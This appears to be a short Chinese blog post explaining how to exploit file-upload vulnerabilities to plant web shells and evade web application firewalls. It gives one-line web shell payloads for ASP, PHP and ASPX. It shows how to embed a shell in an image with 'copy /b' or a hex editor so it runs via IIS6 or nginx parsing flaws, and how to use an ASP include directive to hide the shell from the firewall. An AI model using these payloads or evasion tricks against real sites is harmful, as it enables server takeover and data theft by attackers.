上传漏洞及过WAF

利用上传漏洞

一句话木马:短小精悍,使用较多,先上传一句话用菜刀连后再上传小马或者大马

一些网站的防火墙对大马的防护性比较好,所以我们需要先上传小马再上传大马

asp一句话木马:<%eval request("ccc")%>   ccc就是密码

php一句话木马:<%?php @eval($_POST[value]);?>

aspx一句话木马:<%@ Page Language="Jscript"%>  <%eval(Request.Item["value"])%>

jsp需要专门的jsp客户端

其他脚本常用的客户端需要中国菜刀或中国砍刀等

上传需要漏洞才能上传 

 

一句话木马的制作:

C32:将图片拖到c32里,将一句话木马添加到最后,保存后这个图片就能拿菜刀链接了

使用cmd制作一句话木马,在cmd里使用 copy /b 1.jpg+1.asp 2.jpg  其中1.jpg是图片 1.asp是一句话木马文件 2.jpg是目标图片

或者是右键图片在属性的版权里插入一句话也可以达到木马的制作的目的,就是隐蔽性不太好

小马和大马的区别:小马体积小,便于隐藏,最重要在于与图片结合上传之后可以利用nginx或者iis6的解析漏洞来运行但功能比较少

大马的体积较大,一般在50kb以上功能也多,一般包括:提权命令,磁盘管理,数据库连接接口,执行命令,甚至自带提权压缩,压缩站内网站程序的功能,但隐蔽性不好

 

使用包含突破waf:

如asp包含代码:<!--#include file="1.jpg" -->写到shell目录下改成bao.asp   需要将1.jpg保存到该文件目录,这个图片就是木马

原理为:waf查询时只会看到bao.asp是一个包含代码,而实际的木马在图片里

然后通过该jsp文件便可以绕过waf拿下站点

过狗一句话:通过各种函数去拼成一句话达到欺骗安全狗的目的

posted @ 2021-09-12 16:57  无情之结  阅读(111)  评论(0)    收藏  举报